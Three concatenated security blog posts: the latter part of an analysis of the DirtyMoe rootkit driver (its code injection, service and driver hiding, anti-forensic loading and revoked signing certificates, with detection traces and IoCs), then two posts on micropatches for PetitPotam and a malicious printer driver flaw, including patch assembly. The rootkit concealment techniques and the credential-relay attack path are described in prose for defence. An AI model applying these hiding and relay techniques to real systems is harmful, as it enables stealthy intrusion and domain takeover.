The x86 OS version abuses the entry point of the injected process directly. The procedure is very similar to the x64 injection, and the x86 malicious code is also identical to the x64 version. However, the x86 malicious code needs to find a 32bit variant of the  LdrLoadDll() method. It uses the similar technique described above (NtTestAlert and LdrLoadDll Lookup).

2.8 Service Hiding

Windows uses the Services Control Manager (SCM) to manage the system services. The executable of SCM is services.exe. This program runs at the system startup and performs several functions, such as running, ending, and interacting with system services. The SCM process also keeps all run services in an undocumented service record (SERVICE_RECORD) structure.

The driver must patch the service record to hide a required service. Firstly, the driver must find the process services.exe and attach it to this one via KeStackAttachProcess(). The malware author defined a byte sequence which the driver looks for in the process memory to find the service record. The services.exe keeps all run services as a linked list of SERVICE_RECORD [5]. The malware driver iterates this list and unlinks required services defined by listServices whitelist; see Table 4.

The used byte sequence for Windows 2000, XP, Vista, and Windows 7 is as follows: {45 3B E5 74 40 48 8D 0D}. There is another byte sequence {48 83 3D ?? ?? ?? ?? ?? 48 8D 0D} that is never used because it is bound to the Windows version that the malware driver has never identified; maybe in development.

The hidden services cannot be detected using PowerShell command Get-Service, Windows Task Manager, Process Explorer, etc. However, started services are logged via Windows Event Log. Therefore, we can enumerate all regular services and all logged services. Then, we can create differences to find hidden services.

2.9 Driver Hiding

The driver is able to hide itself or another malicious driver based on the IOCTL from the user-mode. The Driver Entry is initiated by a parameter representing a driver object (DRIVER_OBJECT) of the loaded driver image. The driver object contains an officially undocumented item called a driver section. The LDR_DATA_TABLE_ENTRY kernel structure stores information about the loaded driver, such as base/entry point address, image name, image size, etc. The driver section points to LDR_DATA_TABLE_ENTRY as a double-linked list representing all loaded drivers in the system.

When a user-mode application lists all loaded drivers, the kernel enumerates the double-linked list of the LDR_DATA_TABLE_ENTRY structure. The malware driver iterates the whole list and unlinks items (drivers) that should be hidden. Therefore, the kernel loses pointers to the hidden drivers and cannot enumerate all loaded drivers [6].

2.10 Driver Unload

The Driver Unload function contains suspicious code, but it seems to be never used in this version. The rest of the unload functionality executes standard procedure to unload the driver from the system.

3. Loading Driver During Boot

The DirtyMoe service loads the malicious driver. A driver image is not permanently stored on a disk since the service always extracts, loads, and deletes the driver images on the service startup. The secondary service aim is to eliminate evidence about driver loading and eventually complicate a forensic analysis. The service aspires to camouflage registry and disk activity. The DirtyMoe service is registered as follows:

Service name: Ms<volume_id>App; e.g., MsE3947328App
Registry key: HKLM\SYSTEM\CurrentControlSet\services\<service_name>
ImagePath: %SystemRoot%\system32\svchost.exe -k netsvcs
ServiceDll: C:\Windows\System32\<service_name>.dll, ServiceMain
ServiceType: SERVICE_WIN32_SHARE_PROCESS
ServiceStart: SERVICE_AUTO_START

3.1 Registry Operation

On startup, the service creates a registry record, describing the malicious driver to load; see following example:

Registry key: HKLM\SYSTEM\CurrentControlSet\services\dump_E3947328
ImagePath: \??\C:\Windows\System32\drivers\dump_LSI_FC.sys
DisplayName: dump_E3947328

At first glance, it is evident that ImagePath does not reflect DisplayName, which is the Windows common naming convention. Moreover, ImagePath prefixed with dump_ string is used for virtual drivers (loaded only in memory) managing the memory dump during the Windows crash. The malware tries to use the virtual driver name convention not to be so conspicuous. The principle of the Dump Memory using the virtual drivers is described in [7, 8].

ImagePath values are different from each windows reboot, but it always abuses the name of the system native driver; see a few instances collected during windows boot: dump_ACPI.sys, dump_RASPPPOE.sys, dump_LSI_FC.sys, dump_USBPRINT.sys, dump_VOLMGR.sys, dump_INTELPPM.sys, dump_PARTMGR.sys

3.2 Driver Loading

When the registry entry is ready, the DirtyMoe service dumps the driver into the file defined by ImagePath. Then, the service loads the driver via ZwLoadDriver().

3.3 Evidence Cleanup

When the driver is loaded either successfully or unsuccessfully, the DirtyMoe service starts to mask various malicious components to protect the whole malware hierarchy.

The DirtyMoe service removes the registry key representing the loaded driver; see Registry Operation. Further, the loaded driver hides the malware services, as the Service Hiding section describes. Registry entries related to the driver are removed via the API call. Therefore, a forensics track can be found in the SYSTEM registry HIVE, located in %SystemRoot%\system32\config\SYSTEM. The API call just removes a relevant HIVE pointer, but unreferenced data is still present in the HIVE stored on the disk. Hence, we can read removed registry entries via RegistryExplorer.

The loaded driver also removes the dumped (dump_ prefix) driver file. We were not able to restore this file via tools enabling recovery of deleted files, but it was extracted directly from the service DLL file.

Capturing driver image and register keys

The malware service is responsible for the driver loading and cleans up of loading evidence. We put a breakpoint into the nt!IopLoadDriver() kernel method, which is reached if a process wants to load a driver into the system. We waited for the wanted driver, and then we listed all the system processes. The corresponding service (svchost.exe) has a call stack that contains the kernel call for driver loading, but the corresponding service has been killed by EIP registry modifying. The process (service) was killed, and the whole Windows ended in BSoD. Windows made a crash dump, so the file system caches have been flushed, and the malicious service did not finish the cleanup in time. Therefore, we were able to mount a volume and read all wanted data.

3.4 Forensic Traces

Although the DirtyMoe service takes great pains to cover up the malicious activities, there are a few aspects that help identify the malware.

The DirtyMoe service and loaded driver itself are hidden; however, the Windows Event Log system records information about started services. Therefore, we can get additional information such as ProcessID and ThreadID of all services, including the hidden services.

WinDbg connected to the Windows kernel can display all loaded modules using the lm command. The module list can uncover non-virtual drivers with prefix dump_ and identify the malicious drivers.

Offline connected volume can provide the DLL library of the services and other supporting files, which are unfortunately encrypted and obfuscated with VMProtect. Finally, the offline SYSTEM registry stores records of the DirtyMoe service.

4. Certificates

Windows Vista and later versions of Windows require that loaded drivers must be code-signed. The digital code-signature should verify the identity and integrity of the driver vendor [9]. However, Windows does not check the current status of all certificates signing a Windows driver. So, if one of the certificates in the path is expired or revoked, the driver is still loaded into the system. We will not discuss why Windows loads drivers with invalid certificates since this topic is really wide. The backward compatibility but also a potential impact on the kernel implementation play a role.

DirtyMoe drivers are signed with three certificates as follow:

Beijing Kate Zhanhong Technology Co.,Ltd.
Valid From: 28-Nov-2013 (2:00:00)
Valid To: 29-Nov-2014 (1:59:59)
SN: 3C5883BD1DBCD582AD41C8778E4F56D9
Thumbprint: 02A8DC8B4AEAD80E77B333D61E35B40FBBB010A0
Revocation Status: Revoked on 22-May-‎2014 (9:28:59)

Beijing Founder Apabi Technology Limited
Valid From: 22-May-2018 (2:00:00)
Valid To: 29-May-2019 (14:00:00)
SN: 06B7AA2C37C0876CCB0378D895D71041
Thumbprint: 8564928AA4FBC4BBECF65B402503B2BE3DC60D4D
Revocation Status: Revoked on 22-May-‎2018 (2:00:01)

Shanghai Yulian Software Technology Co., Ltd. (上海域联软件技术有限公司)
Valid From: 23-Mar-2011 (2:00:00)
Valid To: 23-Mar-2012 (1:59:59)
SN: 5F78149EB4F75EB17404A8143AAEAED7
Thumbprint: 31E5380E1E0E1DD841F0C1741B38556B252E6231
Revocation Status: Revoked on 18-Apr-‎2011 (10:42:04)

The certificates have been revoked by their certification authorities, and they are registered as stolen, leaked, misuse, etc. [10]. Although all certificates have been revoked in the past, Windows loads these drivers successfully because the root certificate authorities are marked as trusted.

5. Summarization and Discussion

We summarize the main functionality of the DirtyMoe driver. We discuss the quality of the driver implementation, anti-forensic mechanisms, and stolen certificates for successful driver loading.

5.1 Main Functionality

Authorization

The driver is controlled via IOCTL codes which are sent by malware processes in the user-mode. However, the driver implements the authorization instrument, which verifies that the IOCTLs are sent by authenticated processes. Therefore, not all processes can communicate with the driver.

Affecting the Filesystem

If a rootkit is in the kernel, it can do “anything”. The DirtyMoe driver registers itself in the filter manager and begins to influence the results of filesystem I/O operations; in fact, it begins to filter the content of the filesystem. Furthermore, the driver replaces the NtfsCreatCallback() callback function of the NTFS driver, so the driver can determine who should gain access and what should not get to the filesystem.

Thread Monitoring and Code injection

The DirtyMoe driver enrolls a malicious routine which is invoked if the system creates a new thread. The malicious routine abuses the APC kernel mechanism to execute the malicious code. It loads arbitrary DLL into the new thread. 

Registry Hiding

This technique abuses the kernel hook method that indexes registry keys in HIVE. The code execution of the hook method is redirected to the malicious routine so that the driver can control the indexing of registry keys. Actually, the driver can select which keys will be indexed or not.

Service and Driver Hiding

Patching of specific kernel structures causes that certain API functions do not enumerate all system services or loaded drivers. Windows services and drivers are stored as a double-linked list in the kernel. The driver corrupts the kernel structures so that malicious services and drivers are unlinked from these structures. Consequently, if the kernel iterates these structures for the purpose of enumeration, the malicious items are skipped.

5.2 Anti-Forensic Technique

As we mentioned above, the driver is able to hide itself. But before driver loading, the DirtyMoe service must register the driver in the registry and dump the driver into the file. When the driver is loaded, the DirtyMoe service deletes all registry entries related to the driver loading. The driver deletes its own file from the file system through the kernel-mode. Therefore, the driver is loaded in the memory, but its file is gone.

The DirtyMoe service removes the registry entries via standard API calls. We can restore this data from the physical storage since the API calls only remove the pointer from HIVE. The dumped driver file is never physically stored on the disk drive because its size is too small and is present only in cache memory. Accordingly, the file is removed from the cache before cache flushing to the disk, so we cannot restore the file from the physical disk.

5.3 Discussion

The whole driver serves as an all-in-one super rootkit package. Any malware can register itself in the driver if knowing the authorization code. After successful registration, the malware can use a wide range of driver functionality. Hypothetically, the authorization code is hardcoded, and the driver’s name can be derived so we can communicate with the driver and stop it.

The system loads the driver via the DirtyMoe service within a few seconds. Moreover, the driver file is never present in the file system physically, only in the cache. The driver is loaded via the API call, and the DirtyMoe service keeps a handler of the driver file, so the file manipulation with the driver file is limited. However, the driver removes its own file using kernel-call. Therefore, the driver file is removed from the file system cache, and the driver handler is still relevant, with the difference that the driver file does not exist, including its forensic traces.

The DirtyMoe malware is written using Delphi in most cases. Naturally, the driver is coded in native C. The code style of the driver and the rest of the malware is very different. We analyzed that most of the driver functionalities are downloaded from internet forums as public samples. Each implementation part of the driver is also written in a different style. The malware authors have merged individual rootkit functionality into one kit. They also merged known bugs, so the driver shows a few significant symptoms of driver presence in the system. The authors needed to adapt the functionality of the public samples to their purpose, but that has been done in a very dilettante way. It seems that the malware authors are familiar only with Delphi.

Finally, the code-signature certificates that are used have been revoked in the middle of their validity period. However, the certificates are still widely used for code signing, so the private keys of the certificates have probably been stolen or leaked. In addition, the stolen certificates have been signed by the certification authority which Microsoft trusts, so the certificates signed in this way can be successfully loaded into the system despite their revocation. Moreover, the trend in the use of certificates is growing, and predictions show that it will continue to grow in the future. We will analyze the problems of the code-signature certificates in the future post.

6. Conclusion

DirtyMoe driver is an advanced piece of rootkit that DirtyMoe uses to effectively hide malicious activity on host systems. This research was undertaken to inspect the rootkit functionally of the DirtyMoe driver and evaluate the impact on infected systems. This study set out to investigate and present the analysis of the DirtyMoe driver, namely its functionality, the ability to conceal, deployment, and code-signature.

The research has shown that the driver provides key functionalities to hide malicious processes, services, and registry keys. Another dangerous action of the driver is the injection of malicious code into newly created processes. Moreover, the driver also implements the minifilter, which monitors and affects I/O operations on the file system. Therefore, the content of the file system is filtered, and appropriate files/directories can be hidden for users. An implication of this finding is that malware itself and its artifacts are hidden even for AVs. More importantly, the driver implements another anti-forensic technique which removes the driver’s evidence from disk and registry immediately after driver loading. However, a few traces can be found on the victim’s machines.

This study has provided the first comprehensive review of the driver that protects and serves each malware service and process of the DirtyMoe malware. The scope of this study was limited in terms of driver functionality. However, further experimental investigations are needed to hunt out and investigate other samples that have been signed by the revoked certificates. Because of this, the malware author can be traced and identified using thus abused certificates.

IoCs

Samples (SHA-256)
550F8D092AFCD1D08AC63D9BEE9E7400E5C174B9C64D551A2AD19AD19C0126B1
AABA7DB353EB9400E3471EAAA1CF0105F6D1FAB0CE63F1A2665C8BA0E8963A05
B3B5FFF57040C801A4392DA2AF83F4BF6200C575AA4A64AB9A135B58AA516080
CB95EF8809A89056968B669E038BA84F708DF26ADD18CE4F5F31A5C9338188F9
EB29EDD6211836E6D1877A1658E648BEB749091CE7D459DBD82DC57C84BC52B1

References

[1] Kernel-Mode Driver Architecture
[2] Driver to Hide Processes and Files
[3] A piece of code to hide registry entries
[4] Hidden
[5] Opening Hacker’s Door
[6] Hiding loaded driver with DKOM
[7] Crashdmp-ster Diving the Windows 8 Crash Dump Stack
[8] Ghost drivers named dump_*.sys
[9] Driver Signing
[10] Australian web hosts hit with a Manic Menagerie of malware

Appendix A

Registry entries used in the Start Routine

\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDeviceAddress
\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDeviceNumber
\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDeviceId
\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDeviceName
\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDeviceNameB
\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDeviceNameOnly
\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDriverMaker1
\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDriverMaker1_2
\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDriverMaker2
\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDriverMaker2_2
\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDevicePathA
\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDevicePathB
\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDriverPath1
\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDriverPath1_2
\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDriverPath2
\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDriverPath2_2
\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDeviceDataA
\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDeviceDataB
\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDriverDataA
\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDriverDataA_2
\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDriverDataB
\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDriverDataB_2


Appendix B

Example of registry entries configuring the driver

Key: ControlSet001\Control\WinApi
Value: WinDeviceAddress
Data: Ms312B9050App;   

Value: WinDeviceNumber
Data:
\WINDOWS\AppPatch\Ke601169.xsl;
\WINDOWS\AppPatch\Ke237043.xsl;
\WINDOWS\AppPatch\Ke311799.xsl;
\WINDOWS\AppPatch\Ke119163.xsl;
\WINDOWS\AppPatch\Ke531580.xsl;
\WINDOWS\AppPatch\Ke856583.xsl;
\WINDOWS\AppPatch\Ke999860.xsl;
\WINDOWS\AppPatch\Ke410472.xsl;
\WINDOWS\AppPatch\Ke673389.xsl;
\WINDOWS\AppPatch\Ke687417.xsl;
\WINDOWS\AppPatch\Ke689468.xsl;
\WINDOWS\AppPatch\Ac312B9050.sdb;
\WINDOWS\System32\Ms312B9050App.dll;

Value: WinDeviceName
Data:
C:\WINDOWS\AppPatch\Ac312B9050.sdb;
C:\WINDOWS\System32\Ms312B9050App.dll;

Value: WinDeviceId
Data: dump_FDC.sys;

The post DirtyMoe: Rootkit Driver appeared first on Avast Threat Labs.

Free Micropatches for "PetitPotam" (CVE-2021-36942)

6 August 2021 at 13:27


 

by Mitja Kolsek, the 0patch Team


Update 8/11/2021-A: August 2021 Windows Updates brought a fix for PetitPotam, which, in contrast to our patch that fixes an impersonation issue and keeps EfsRpcOpenFileRaw request functional, disables the EfsRpcOpenFileRaw request. CVE-2021-36942 was assigned to this vulnerability. More details below in the Microsoft's Patch section.

Update 8/11/2021-B: Neither Microsoft's August fix nor our micropatch seem to have covered all PetitPotam affected code. Both fixed the anonymous attack vector but we're investigating additional authenticated paths now and looking for the best way to patch that too. The most effective PetitPotam mitigation currently remains this RPC filter on all Domain Controllers, although it may be an overly broad measure and could break something, so proceed with caution.  

Update 8/19/2021: After further analysis of additional PetitPotam attack vectors, we created additional micropatches that block all these vectors. Today's PetitPotam patches are written for executables from August 2021 Windows Updates, which means you have to have these updates installed (i.e., fully updated Windows as of this writing) in order to have them applied. 

Update 9/15/2021: September 2021 Windows Updates did not bring any changes regarding the new PetitPotam attack vectors, so our micropatches remain free.


Wow, we're busy these days. Just yesterday we issued micropatches for the "Malicious Printer Driver" 0day, and today we're fixing a critical remote code execution issue that allows an anonymous attacker to take over a Windows Domain Controller: the infamous "PetitPotam" bug.

PetitPotam was discovered by security researcher topotam, who published their proof-of-concept on Github on July 20, 2021. There is no official vendor patch for it at the time of this writing; in fact, Microsoft's support article implies they do not consider this a vulnerability but rather a mis-configuration, and provides some generic mitigations that do not address the root issue.

As usually, CERT/CC vulnerability note by Will Dormann nicely explains the vulnerability and an exploit chain leading to a complete domain takeover. The main problem is that any user - even anonymous - can force a domain controller to send NTLM credentials of its computer account to attacker's server, where these can be received and then relayed to another service in the domain to make a malicious privileged request.

 

Analysis

We took a look at what goes on in the code when an EfsRpcOpenFileRaw request is received by the server. It is function  EfsRpcOpenFileRaw_Downlevel in efslsaext.dll that processes this request. This function has most of its code enclosed in an impersonation block between a call to RpcImpersonateClient and a call to RpcRevertToSelf. Code inside this block is being executed under the identity of the requesting entity (in our case, attacker), while code outside executes as Local System, i.e., the computer account.

Unfortunately, function EfsRpcOpenFileRaw_Downlevel, outside the impersonation block, makes a call to EfsGetLocalFileName, which tries to open the attacker-supplied UNC path. By doing so, it sends local computer's NTLM credentials inside the SMB request to the remote network share. If the attacker is waiting on the other end, they get these credentials.

Let's take a look at relevant parts of function EfsRpcOpenFileRaw_Downlevel:


Beginning of function EfsRpcOpenFileRaw_Downlevel, with the call to EfsGetLocalFilename being called without impersonation

Continuation of function EfsRpcOpenFileRaw_Downlevel

Note that only this call to EfsGetLocalFileName is non-impersonated, while core EFSRPC functionality executes under requester's identity. This means that anonymous or unprivileged user cannot remotely execute EFSRPC functions such as reading or creating arbitrary network files.

 

Micropatch

Our micropatch extends the impersonation block such that it now encloses the previously un-impersonated call to EfsGetLocalFileName; as a result, the SMB request which this function triggers contains attacker's NTLM credentials instead of computer account's. Therefore, in case of an anonymous request the attacker gets credentials of the ANONYMOUS LOGON user (which are of no use), and if they use credentials of a Windows domain user, the acquired NTLM credentials will be of that same user (which they already have).

The patch contains two patchlets, one starting impersonation by calling RpcImpersonateClient,  and another stopping impersonation by calling RpcRevertToSelf.



MODULE_PATH "..\Affected_Modules\efslsaext.dll_10.0.17763.1075_64bit_WinSrv2019-u202107\efslsaext.dll"
PATCH_ID 663
PATCH_FORMAT_VER 2
VULN_ID 7174
PLATFORM win64

patchlet_start
    PATCHLET_ID 1
    PATCHLET_TYPE 2
    PATCHLET_OFFSET 0x280c
    N_ORIGINALBYTES 5
    JUMPOVERBYTES 0
    PIT rpcrt4!0x53370,efslsaext!0x288c
    ;0x53370 -> RpcImpersonateClient
    ;0x288c -> Error block
    
    code_start    ;Injected at the top of the block containing
                   EfsRpcGetLocalFileName, in the EfsRpcOpenFileRaw_Downlevel
                   function
        mov rcx, 0        ;Set rcx for RpcImpersonateClient to 0, so it
                           impersonates the current client
        call PIT_0x53370  ;Call RpcImpersonateClient
        mov rbx, rax      ;Move the result to rbx, so it can be used for error
                           reporting in case of failure   
        cmp rax, 0        ;Check if impersonation failed
        jne PIT_0x288c    ;If failed, jump to error block
    code_end
    
patchlet_end

patchlet_start
    PATCHLET_ID 2
    PATCHLET_TYPE 2
    PATCHLET_OFFSET 0x288c
    N_ORIGINALBYTES 5
    JUMPOVERBYTES 0
    PIT rpcrt4!0x563b0
    ;0x563b0 -> RpcReverToSelf
    
    code_start  ;Injected at the top of the block right after the
                 RpcRevertToSelf call, in the EfsRpcOpenFileRaw_Downlevel function
        call PIT_0x563b0    ;Call RpcRevertToSelf to stop impersonating
    code_end
    
patchlet_end

   

 

Let's look at the difference between running the PetitPotam tool against a fully updated Windows Server without and with 0patch.


Without 0patch

Let's see which user executes the call to EfsGetLocalFileName:


 

As expected, it's Local System. And the PetitPotam tool, chained with Active Directory Certificate Server produces domain controller's certificate:

 


With 0patch

Let's see which user executes the call to EfsGetLocalFileName this time:

 


Good, it's the Anonymous Logon user, which is useless to the attacker. Consequently, the PetitPotam attack doesn't work anymore:

 


Patch Availability

This micropatch was written for:

 

  1. Windows Server 2019 (updated with July 2021 Updates)
  2. Windows Server 2016 (updated with July 2021 Updates)
  3. Windows Server 2012 R2 (updated with July 2021 Updates)
  4. Windows Server 2008 R2 (updated with January 2020 Updates, no Extended Security Updates) 

 

Our tests indicate that Windows Server 2012 (non R2), Windows Server 2008 (non R2) and Windows Server 2003 are not affected by this issue.

Micropatches for this vulnerability are, as always, automatically downloaded and applied to all affected computers (unless your policy prevents that), and will be free until Microsoft has issued an official fix. If you want to use them, create a free account at 0patch Central, then install and register 0patch Agent from 0patch.com. Everything else will happen automatically. No computer reboots will be needed.

Compatibility note: Some Windows 10 and Server systems exhibit occasional timeouts in the Software Protection Platform Service (sppsvc.exe) on a system running 0patch Agent. This looks like a bug in Windows Code Integrity mitigation that prevents a 0patch component to be injected in the service (which is okay) but sometimes also does a lot of seemingly meaningless processing that causes process startup to time out. As a result, various licensing-related errors can occur. The issue, should it occur, can be resolved by excluding sppsvc.exe from 0patch injection as described in this article.

Update 8/19/2021: Microsoft's August 2021 updates brought a functionally similar fix as our micropatch, but since other attack vectors were subsequently discovered, we have issued additional micropatches that apply on top of August 2021 Windows executables. In order to use them, you have to have August 2021 Windows Updates applied. In addition, we have found Windows Server 2012 to be affected to these additional vectors and have also covered this Windows version with our new micropatches.


[Update 8/11/2021: added section Microsoft's Patch]

Microsoft's Patch

August 2021 Windows Updates brought Microsoft's official fix for this issue. The associated documentation states: "The EFS API OpenEncryptedFileRaw(A/W), often used in backup software, continues to work in all versions of Windows (local and remote), except when backing up to or from a system running Windows Server 2008 SP2. OpenEncryptedFileRaw will no longer work on Windows Server 2008 SP2. Note: If you are unable to use backup software on Windows 7 Service Pack 1 and Windows Server 2008 R2 Service Pack 1 and later, after installing the updates that address this CVE, contact the manufacturer of your backup software for updates and support."

 Let's take a look at this fix.

 


Microsoft's fix is in the same function as our micropatch ( EfsRpcOpenFileRaw_Downlevel in efslsaext.dll), but it sabotages the function so it doesn't work anymore. We actually also sometimes sabotage an entire function if it seems that could affect such a small amount of users that the benefits would outweigh the risk. In fact, we were initially inclined to do it here too as we were unable to find any backup product or mechanism that would be using this function - but then decided to rather fix the obvious bug we had noticed, and keep the function "alive".

Note that Microsoft's fix also includes a hidden undocumented feature: instead of outright sabotaging OpenEncryptedFileRaw, the fix checks an undocumented registry value AllowOpenRawDL (DWORD) under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EFS; if this value exists and is equal to 1, OpenEncryptedFileRaw works as before. Therefore, if Microsoft's fix broke your backup, you can disable it using this value, but doing so will make you vulnerable to the PetitPotam attack.

We find this Microsoft's fix to be appropriate and therefore do not plan to port our PetitPotam micropatch to the August 2021 version of efslsaext.dll unless 0patch users come complaining the fix broke their backup. We also invite any Windows users whose backup got broken by August 2021 Windows Update to contact us at [email protected].

Update 8/11/2021: Neither Microsoft's August fix nor our micropatch seem to have covered all PetitPotam affected code. Both fixed the anonymous attack vector but we're investigating additional authenticated paths now and looking for the best way to patch that too. 

Update 8/19/2021: Our new micropatches released today address these additional attack vectors.

 

Credits

We'd like to thank topotam for sharing details about this vulnerability, and Will Dormann, Benjamin Delpy and Kevin Beaumont for sharing lots of useful insights and context that helped us understand this vulnerability and create this micropatch to protect users.

Please revisit this blog post for updates or follow 0patch on Twitter.

Free Micropatches for Malicious Printer Driver Issue (CVE-2021-36958)

5 August 2021 at 13:15

 


 

by Mitja Kolsek, the 0patch Team

[Update 9/15/2021: September 2021 Windows Updates fixed this vulnerability in effectively the same way our micropatch did. The issue was assigned CVE-2021-36958]

[Update 8/11/2021: August 2021 Windows Updates did not fix this vulnerability. We're therefore porting our micropatch to the August versions of executables.]

 

With PrintNightmare vulnerability still echoing (and still without a complete official fix, in our view), another printing-related issue was found by security researcher Benjamin Delpy that allows a local unprivileged user on a Windows machine to execute arbitrary code as System by installing a malicious printer driver.

In essence, the attacker sets up a printer with a modified driver on a machine they control, and then installs this printer using Point and Print on another Windows computer, gaining full control of said computer. While generally considered a local privilege escalation, this issue could also be used in conjunction with some social engineering to get a remote attacker's code executed on user's machine.

The issue is nicely described in this CERT/CC vulnerability note written by Will Dormann. While Windows have been requiring printer driver packages installed via Point and Print to be signed by a trusted source since 2016, Benjamin discovered that additional executable files can be included in such installation outside the signed package, and these would then be automatically loaded (and their code executed) by the Print Spooler service running as System.


How To Fix This?

In contrast to, say, memory corruption bugs or numeric overflows, this is not a trivial issue to fix; adding signature requirement to queue-specific files would require a lot of code and would be incompatible with the "micro" in micropatching. Disabling the transfer of queue-specific files could do the trick, but might result in confused users when installed printers would suddenly behave differently than before without any notification or warning.

We therefore decided to implement the group policy-based workaround as a micropatch, blocking Point and Print printer driver installation from untrusted servers. This workaround employs Group Policy settings: the "Only use Package Point and Print" first requires every printer driver is in form of a signed package, while the "Package Point and print - Approved servers" limits the set of servers from which printer driver packages are allowed to be installed.

These settings are configurable via registry. Our patch modifies function DoesPolicyAllowPrinterConnectionsToServer in win32spl.dll such that it believes that PackagePointAndPrintOnly and PackagePointAndPrintServerList values exist and are set to 1, which enables both policies and keeps the list of approved servers empty.

Of course, if one has not previously configured Point and Print-related group policy settings, our patch breaks Point and Print driver installation because no servers are approved. On the other hand, on computers which already have these policies enabled, our patch has no effect. The reasoning behind our approach was that many Windows users and admins don't even know they're affected by this issue and just having 0patch installed will automatically resolve this vulnerability for them.

Our micropatch has four tiny patchlets:



MODULE_PATH "..\Affected_Modules\win32spl.dll_10.0.19041.746_32bit_Win10-2004-u202107\win32spl.dll"
PATCH_ID 660
PATCH_FORMAT_VER 2
VULN_ID 7172
PLATFORM win32
patchlet_start
    PATCHLET_ID 1
    PATCHLET_TYPE 2
    PATCHLET_OFFSET 0x4ff70
    N_ORIGINALBYTES 5
    JUMPOVERBYTES 5
    
    code_start
        mov eax, 0   ; we say that registry key PackagePointAndPrint exists
 
       add esp, 0Ch ; align stack pointer
    code_end
    
patchlet_end
patchlet_start
    PATCHLET_ID 2
    PATCHLET_TYPE 2
    PATCHLET_OFFSET 0x4ff8e
    N_ORIGINALBYTES 5
    JUMPOVERBYTES 5
    
    code_start
        mov eax, 0            ; we say
that value PackagePointAndPrintOnly exists
        add esp, 18h          ; align stack pointer
        mov dword[ebp-2Ch], 1 ; value of PackagePointAndPrintOnly is 1
    code_end
    
patchlet_end
patchlet_start
    PATCHLET_ID 3
    PATCHLET_TYPE 2
    PATCHLET_OFFSET 0x50018
    N_ORIGINALBYTES 5
    JUMPOVERBYTES 5
    
    code_start
        mov eax, 0   ; we say that registry key PackagePointAndPrint exists
 
       add esp, 0Ch ; align stack pointer
    code_end
    
patchlet_end
patchlet_start
    PATCHLET_ID 4
    PATCHLET_TYPE 2
    PATCHLET_OFFSET 0x50039
    N_ORIGINALBYTES 5
    JUMPOVERBYTES 5
    
    code_start
        mov eax, 0            ; we say that value PackagePointAndPrintServerList exists
        add esp, 18h          ; align stack pointer
        mov dword[ebp-2Ch], 1 ; value of PackagePointAndPrintServerList is 1
    code_end
    
patchlet_end

   

 

And the video of our patch in action:



This micropatch was written for:

 

  1. Windows Server 2019 (updated with July 2021 Updates)
  2. Windows Server 2016 (updated with July 2021 Updates)
  3. Windows Server 2012 R2 (updated with July 2021 Updates)
  4. Windows Server 2012 (updated with July 2021 Updates)
  5. Windows Server 2008 R2 (updated with January 2020 Updates, no Extended Security Updates) 
  6. Windows Server 2008 R2 (updated with January 2021 Updates, first year of Extended Security Updates only) 
  7. Windows Server 2008 R2 (updated with July 2021 Updates, second year of Extended Security Updates) 
  8. Windows 10 v21H1 (updated with July Updates)
  9. Windows 10 v20H2 (updated with July Updates)
  10. Windows 10 v2004 (updated with July Updates) 
  11. Windows 10 v1909 (updated with July Updates) 
  12. Windows 10 v1903 (updated with December 2020 Updates - latest before end of support)
  13. Windows 10 v1809 (updated with May 2021 Updates - latest before end of support) 
  14. Windows 10 v1803 (updated with May 2021 Updates - latest before end of support)
  15. Windows 10 v1709 (updated with October 2020 Updates - latest before end of support)
  16. Windows 7 (updated with January 2020 Updates, no Extended Security Updates)
  17. Windows 7 (updated with January 2021 Updates, first year of Extended Security Updates only)
  18. Windows 7 (updated with July 2021 Updates, second year of Extended Security Updates)


Micropatches for this vulnerability will be free until Microsoft has issued an official fix. If you want to use them, create a free account at 0patch Central, then install and register 0patch Agent from 0patch.com. Everything else will happen automatically. No computer reboots will be needed.

Compatibility note: Some Windows 10 and Server systems exhibit occasional timeouts in the Software Protection Platform Service (sppsvc.exe) on a system running 0patch Agent. This looks like a bug in Windows Code Integrity mitigation that prevents a 0patch component to be injected in the service (which is okay) but sometimes also does a lot of seemingly meaningless processing that causes process startup to time out. As a result, various licensing-related errors can occur. The issue, should it occur, can be resolved by excluding sppsvc.exe from 0patch injection as described in this article.

 

What to do if the patch breaks printing?

If printing in your network utilizes Point and Print, our patch can cause problems such as users being unable to print to their printers or even seeing them on a network share. If this happens, we recommend adding servers hosting your printers to the approved server list as follows:

  1. Launch mmc.exe as administrator
  2. Select File -> Add/Remove Snap-in
  3. Add "Group Policy Object Editor"
  4. Under Computer Configuration -> Administrative Templates -> Printers, open the "Package Point and print - Approved servers" policy
  5. Enable the policy, click the "Show" button, and add the servers your printers are on to the list

 

Credits

We'd like to thank Benjamin Delpy for sharing details about this vulnerability, and Will Dormann and Kevin Beaumont for sharing lots of useful insights and context that helped us create this micropatch and protect 0patch users.

Please revisit this blog post for updates or follow 0patch on Twitter.

 

 

 

 

